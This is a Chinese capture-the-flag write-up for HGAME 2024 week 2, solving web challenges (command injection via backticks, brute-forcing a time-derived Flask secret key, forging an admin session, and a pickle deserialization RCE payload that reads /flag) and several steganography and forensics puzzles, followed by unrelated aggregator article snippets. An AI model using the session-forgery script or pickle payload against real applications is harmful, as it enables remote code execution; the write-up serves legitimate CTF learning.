HGAME2024 WEEK2 wp webmisc

web

What the cow say?

进入容器有个输入框,尝试ssti、命令执行、代码执行等,最后发现可使用反引号执行命令;

输入 `nl app.py` 可查看源代码,有功能具体实现、过滤之类的;

flag在 /flag_is_here home/flag_c0w54y 中,执行命令获取flag;

myflask

访问题目地址获得app.py源代码;

# app.py
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezonecurrentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)@app.route('/')
def index():session['username'] = 'guest'return send_file('app.py')@app.route('/flag', methods=['GET', 'POST'])
def flag():if not session:return 'There is no session available in your client :('if request.method == 'GET':return 'You are {} now'.format(session['username'])# For POST requests from adminif session['username'] == 'admin':pickle_data=base64.b64decode(request.form.get('pickle_data'))# Tips: Here try to trigger RCEuserdata=pickle.loads(pickle_data)return userdataelse:return 'Access Denied'if __name__=='__main__':app.run(debug=True, host="0.0.0.0")

分析源码,/ 路由可下载app.py文件,/flag 路由会判断有无session,有session则输入对应用户名,如果session的用户名为admin,会对post传入的数据进行pickle反序列化,明显存在pickle反序列化漏洞;

首先需要进行session伪造,密钥由时间的时分秒组合而成,如在10:10:10时间获取的session,则密钥为101010,写脚本对获取session的1分钟时间爆破即可;

开启环境,访问 / 路由,并记录时间如13:25,访问/flag此时为guest用户

python版本为3,使用flask_session_cookie_manager3.py伪造session,写脚本爆破session密钥,记录的时间为13:25,爆破132500-132559即可;

# 1.py
import osfor k in range(0, 60):if k < 10:secret = '13250' + str(k)else:secret = '1325' + str(k)c = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcDf2A.gSn2YomfAAl0qozjgrBDN5194Bc"print(os.popen(f"python flask_session_cookie_manager3.py decode -s {secret} -c {c}").read(), end='')print('*****' + secret)

伪造session,并修改网站session,此时为admin用户,可以进行pickle反序列化了;

构造payload;

import pickle
import base64class Flag(object):def __reduce__(self):return (eval, ("__import__('os').popen('cat /flag').read()",))flag = Flag()
print(base64.b64encode(pickle.dumps(flag)))# payload
# pickle_data=gASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9mbGFnJykucmVhZCgplIWUUpQu

提交payload进行pickle反序列化触发rce获取flag;

misc

ek1ng_want_girlfriend

流量分析,使用wireshark打开流量包过滤http,发现有一张图片ek1ng.jpg;

选中请求图片的响应(241 HTTP/1.0 200 OK),选择 文件 => 导出对象 => http,导出ek1ng.jpg图片保存;

打开导出的图片,发现flag在图片下方;

龙之舞

下载附件deepsound_of_dragon_dance.wav,根据附件名猜测deepsound隐写,使用工具打开发现需要密码;

将附件放入Audacity查看频谱图发现隐写数据;

需要上下翻转看,内容为:KEY  : 5H8w1nlWCX3hQLG ,使用5H8w1nlWCX3hQLG 作为deepsound密码,成功分离出隐藏的压缩包;

压缩包内是一张gif动图,在第55、121、153、232帧处分别有一张四分之一的二维码图片;

将四张二维码碎片拼接并修复后扫描获得flag;

ezWord

下载附件是一个word文档,将后缀改为zip解压,发现word/media目录下有四个文件;

结合题目描述:通过破译图片的水印来解开文档里的秘密吧!,可知两张图片为盲水印,使用blindwatermark 工具可提取盲水印,T1hi3sI4sKey,根据 恭喜.txt 中提示为压缩包密码;

# 盲水印提取
python bwmforpy3.py decode 100191209_p0.jpg image1.png password.png# blindwatermark工具下载
https://github.com/chishaxie/BlindWaterMark

使用 T1hi3sI4sKey 密码解压secret.zip,在secret.txt中有如下一段英文;

Dear E-Commerce professional ; This letter was specially
selected to be sent to you . We will comply with all
removal requests ! This mail is being sent in compliance
with Senate bill 1620 ; Title 3 ; Section 308 ! This
is not a get rich scheme ! Why work for somebody else
when you can become rich in 27 MONTHS . Have you ever
noticed more people than ever are surfing the web and
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU use credit cards on your website plus turn your
business into an E-BUSINESS . You are guaranteed to
succeed because we take all the risk ! But don't believe
us . Ms Simpson who resides in Maine tried us and says
"I've been poor and I've been rich - rich is better"
. We are a BBB member in good standing ! We urge you
to contact us today for your own future financial well-being
. Sign up a friend and you'll get a discount of 50%
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2316 ; Title 8 , Section 301 ! Do NOT confuse
us with Internet scam artists . Why work for somebody
else when you can become rich as few as 24 WEEKS !
Have you ever noticed more people than ever are surfing
the web plus how many people you know are on the Internet
. Well, now is your chance to capitalize on this .
We will help you decrease perceived waiting time by
200% and turn your business into an E-BUSINESS . You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson of Illinois tried
us and says "Now I'm rich many more things are possible"
! We assure you that we operate within all applicable
laws ! Do not delay - order today . Sign up a friend
and your friend will be rich too . Warmest regards
! Dear Sir or Madam ; Especially for you - this hot
information . We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1916 ; Title 2 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING ! Why work for somebody else when you can
become rich in 89 days . Have you ever noticed most
everyone has a cellphone plus most everyone has a cellphone
! Well, now is your chance to capitalize on this !
WE will help YOU sell more & SELL MORE . You can begin
at absolutely no cost to you . But don't believe us
. Mr Jones of Minnesota tried us and says "I was skeptical
but it worked for me" ! We assure you that we operate
within all applicable laws ! We beseech you - act now
. Sign up a friend and you'll get a discount of 90%
. Thanks . Dear Cybercitizen ; Your email address has
been submitted to us indicating your interest in our
newsletter . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 2016 , Title 2 , Section
304 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
in 48 weeks ! Have you ever noticed more people than
ever are surfing the web plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU deliver goods right to the customer's
doorstep & turn your business into an E-BUSINESS .
You can begin at absolutely no cost to you . But don't
believe us . Ms Anderson who resides in New York tried
us and says "My only problem now is where to park all
my cars" ! We are a BBB member in good standing . If
not for you then for your LOVED ONES - act now ! Sign
up a friend and you'll get a discount of 20% ! God
Bless . Dear Colleague , Your email address has been
submitted to us indicating your interest in our publication
. If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our mailing list . This
mail is being sent in compliance with Senate bill 2416
, Title 9 ; Section 308 ! This is NOT unsolicited bulk
mail . Why work for somebody else when you can become
rich within 24 MONTHS ! Have you ever noticed most
everyone has a cellphone and people love convenience
. Well, now is your chance to capitalize on this !
We will help you decrease perceived waiting time by
190% and sell more ! The best thing about our system
is that it is absolutely risk free for you ! But don't
believe us . Mrs Anderson of Indiana tried us and says
"Now I'm rich, Rich, RICH" . This offer is 100% legal
. So make yourself rich now by ordering immediately
. Sign up a friend and your friend will be rich too
. God Bless ! Dear Colleague ; We know you are interested
in receiving amazing information ! If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
1619 , Title 7 , Section 303 ! This is not multi-level
marketing . Why work for somebody else when you can
become rich within 37 days ! Have you ever noticed
nobody is getting any younger plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU decrease perceived waiting time by
140% plus deliver goods right to the customer's doorstep
. You can begin at absolutely no cost to you . But
don't believe us ! Mrs Simpson of Illinois tried us
and says "I was skeptical but it worked for me" . We
are licensed to operate in all states ! Because the
Internet operates on "Internet time" you must make
a commitment soon ! Sign up a friend and you get half
off ! Thank-you for your serious consideration of our
offer . Dear Friend ; We know you are interested in
receiving amazing info ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2716 , Title 5 , Section 303 ! This is
not a get rich scheme . Why work for somebody else
when you can become rich within 52 days ! Have you
ever noticed how many people you know are on the Internet
and the baby boomers are more demanding than their
parents ! Well, now is your chance to capitalize on
this . WE will help YOU decrease perceived waiting
time by 170% and turn your business into an E-BUSINESS
. You are guaranteed to succeed because we take all
the risk ! But don't believe us ! Mrs Anderson who
resides in Alabama tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. So make yourself rich now by ordering immediately
! Sign up a friend and you get half off ! Thanks .
Dear Salaryman ; Especially for you - this red-hot
news ! We will comply with all removal requests . This
mail is being sent in compliance with Senate bill 1618
, Title 4 , Section 308 . THIS IS NOT MULTI-LEVEL MARKETING
. Why work for somebody else when you can become rich
inside 27 days ! Have you ever noticed nearly every
commercial on television has a .com on in it & nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
180% plus turn your business into an E-BUSINESS . You
can begin at absolutely no cost to you ! But don't
believe us ! Prof Ames who resides in Washington tried
us and says "I was skeptical but it worked for me"
. We assure you that we operate within all applicable
laws ! We implore you - act now . Sign up a friend
and you'll get a discount of 10% . Thank-you for your
serious consideration of our offer ! Dear Friend ;
This letter was specially selected to be sent to you
! If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our club ! This mail is
being sent in compliance with Senate bill 1622 , Title
7 ; Section 303 ! Do NOT confuse us with Internet scam
artists . Why work for somebody else when you can become
rich in 10 weeks ! Have you ever noticed people will
do almost anything to avoid mailing their bills & people
love convenience ! Well, now is your chance to capitalize
on this . WE will help YOU turn your business into
an E-BUSINESS & SELL MORE . You can begin at absolutely
no cost to you ! But don't believe us . Mr Ames of
Louisiana tried us and says "Now I'm rich, Rich, RICH"
. We are licensed to operate in all states . We BESEECH
you - act now . Sign up a friend and you'll get a discount
of 50% ! Thank-you for your serious consideration of
our offer .

搜索发现是 卡尔达诺栅格码Spam Mimic ,在线网站spammimic - decode解密获得如下中文;

籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆

中文转unicode,获得16进制数

71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86

 对比前几个16进制数,发现与 hgame 的ascii码差9,写脚本获取flag;

a = '71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86'
flag = ''
for i in range(0, len(a), 2):flag += chr(int(a[i: i +2], 16) - 9)
print(flag) # hgame{0k_you_s0lve_al1_th3_secr3t}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/683949.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

每日OJ题_递归②_力扣21. 合并两个有序链表

目录 力扣21. 合并两个有序链表 解析代码 力扣21. 合并两个有序链表 21. 合并两个有序链表 难度 简单 将两个升序链表合并为一个新的 升序 链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。 示例 1&#xff1a; 输入&#xff1a;l1 [1,2,4], l2 [1,3,4]…

CSS设置盒子阴影

语法 box-shadow: *h-shadow v-shadow blur spread color* inset; 注释: box-shadow向框添加一个或多个阴影. 该属性是由逗号分隔的阴影列表,每个阴影由2-4个长度值、可选的颜色值及可选的inset关键词来规定。省略长度的值是0。 外阴影 a、给元素右边框和下边框加外阴影——把…

LabVIEW虚拟测试与分析仪

LabVIEW虚拟测试与分析仪 在现代工程技术领域&#xff0c;虚拟仪器的开发和应用已成为一种趋势。利用LabVIEW软件平台开发的虚拟测试与分析仪器进行展开&#xff0c;实现工程测试和分析中的实际需求。通过结合LabVIEW的强大功能和灵活性&#xff0c;成功实现了一套高效、精确的…

Gemini 1.5 Pro揭秘:Google DeepMind新一代AI模型如何突破千万级别词汇限制?

Gemini 1.5 Pro 发布&#xff01; 这款模型凭借其超长的上下文处理能力脱颖而出&#xff0c;支持10M tokens。 它的多模态特性意味着&#xff0c;无论面对多么庞大复杂的内容&#xff0c;Gemini 1.5 Pro都能游刃有余地应对。 在AI的世界里&#xff0c;上下文的理解如同记忆的…

嵌入式中UART通信的方法

UART是一种异步全双工串行通信协议&#xff0c;由 Tx 和 Rx 两根数据线组成&#xff0c;因为没有参考时钟信号&#xff0c;所以通信的双方必须约定串口波特率、数据位宽、奇偶校验位、停止位等配置参数&#xff0c;从而按照相同的速率进行通信。 异步通信以一个字符为传输单位…

插值(一)——多项式插值(C++)

插值 插值的作用是可以将原本比较难计算的函数转换为误差在一定范围内的多项式&#xff0c;比如在单片机中直接计算 x 、 log ⁡ 2 x \sqrt{x}、\log_2x x ​、log2​x之类的函数是比较麻烦的&#xff0c;但是使用插值的方法就可以将其转换为误差可控的只有乘法和加减法的多项…

MySQL学习记录——팔 函数

文章目录 1、日期函数2、字符串函数3、数学函数4、其它函数 1、日期函数 //获取日期 select current_date(); //获取时间 select current_time(); //获取时间戳, 格式为日期时间 select current_timestamp(); //获取当前时间, 格式为日期时间 select now(); //获取参数的日期部…

Leetcode-1572. 矩阵对角线元素的和

题目&#xff1a; 给你一个正方形矩阵 mat&#xff0c;请你返回矩阵对角线元素的和。 请你返回在矩阵主对角线上的元素和副对角线上且不在主对角线上元素的和。 示例 1&#xff1a; 输入&#xff1a;mat [[1,2,3],[4,5,6],[7,8,9]] 输出&#xff1a;25 解释&#xff1a;对角线…

RK3568笔记十六:Framebuffer实验

若该文为原创文章&#xff0c;转载请注明原文出处。 本意是移植LVGL&#xff0c;但在编译DRM过程中一直编译失败&#xff0c;然后就想Framebuffer是否可以用&#xff0c;所以测试一下。 一、framebuffer介绍 FrameBuffer中文译名为帧缓冲驱动&#xff0c;它是出现在2.2.xx内…

leetcode(二分查找)34.在排序数组中查找元素的第一个和最后一个位置(C++详细解释)DAY11

文章目录 1.题目示例提示 2.解答思路3.实现代码结果 4.总结 1.题目 给你一个按照非递减顺序排列的整数数组 nums&#xff0c;和一个目标值 target。请你找出给定目标值在数组中的开始位置和结束位置。 如果数组中不存在目标值 target&#xff0c;返回 [-1, -1]。 你必须设计…

SECS/GEM的HSMS通讯?金南瓜方案

High Speed SECS Message Service (HSMS) 是一种基于 TCP/IP 的协议&#xff0c;它使得 SECS 消息通信更加快速。这通常用作设备间通信的接口。 HSMS 状态逻辑变化&#xff08;序列&#xff09;&#xff1a; 1.Not Connected&#xff1a;准备初始化 TCP/IP 连接&#xff0c;但尚…

【C深度解剖】取模与取余

简介&#xff1a;本系列博客为C深度解剖系列内容&#xff0c;以某个点为中心进行相关详细拓展 适宜人群&#xff1a;已大体了解C语法同学 作者留言&#xff1a;本博客相关内容如需转载请注明出处&#xff0c;本人学疏才浅&#xff0c;难免存在些许错误&#xff0c;望留言指正 作…

SpringCloud之Nacos用法笔记

SpringCloud之Nacos注册中心 Nacos注册中心nacos启动服务注册到Nacosnacos服务分级模型NacosRule负载均衡策略根据集群负载均衡加权负载均衡Nacos环境隔离-namespace Nacos与eureka的对比临时实例与非临时实例设置 Nacos配置管理统一配置管理微服务配置拉取配置自动刷新远端配置…

1232.缀点成线(Java)

题目描述&#xff1a; 给定一个数组 coordinates &#xff0c;其中 coordinates[i] [x, y] &#xff0c; [x, y] 表示横坐标为 x、纵坐标为 y 的点。请你来判断&#xff0c;这些点是否在该坐标系中属于同一条直线上。 输入&#xff1a; coordinates [[1,2],[2,3],[3,4],[4,5]…

机器学习:数据集划分笔记

数据集划分是机器学习中非常关键的步骤&#xff0c;能直接影响模型的训练效果和泛化能力。它的主要目的是为了评估模型对新数据的泛化能力&#xff0c;即模型在未见过的数据上能表现良好。 数据集通常被划分为三个部分&#xff1a;训练集&#xff08;Training set&#xff09;、…

问题:实行网络化管理,为此需要做好以下几个方面的工作。() #知识分享#其他#职场发展

问题&#xff1a;实行网络化管理&#xff0c;为此需要做好以下几个方面的工作。() A、建立“公共部门—私人部门—第三部门”的合作网络 B、采用平等协商、双向互动、共同参与的决策方式&#xff0c;参与式决策应当成为网络化管理中的主要决策方式 C、建立“公共部门—私人部…

vue axios 请求后端无法传参问题

vue请求后端无法传参问题 问题描述处理过程总结 问题描述 在学习vue时&#xff0c;使用axios调用后端&#xff0c;发现无法把参数正确传到后端&#xff0c;现象如下&#xff1a; 使用vue发起请求&#xff0c;浏览器上已经有传参&#xff0c;但是后端没接收到对应的用户名密码&…

算法之贪心

1.部分背包问题 代码1&#xff1a; 代码2&#xff1a; 但如果金币不能分割&#xff0c;那贪心就不是最优解&#xff0c;正确的做法是搜索或动态规划。 2.排队接水 3.在规定时间内参加最多的比赛 4.合并果子 使用memset初始化int数组时&#xff0c;第二个参数如果是0&#xff0…

uniapp 开发一个密码管理app

密码管理app 介绍 最近发现自己的账号密码真的是太多了&#xff0c;各种网站&#xff0c;系统&#xff0c;公司内网的&#xff0c;很多站点在登陆的时候都要重新设置密码或者通过短信或者邮箱重新设置密码&#xff0c;真的很麻烦 所以准备开发一个app用来记录这些站好和密码…

软件风险分类整理

软件项目风险分类整理 1.需求分析 2.软件设计 3.编码和单元测试 4.集成和测试 5.验收和维护 6.团队管理 7.成本管理 8.组织管理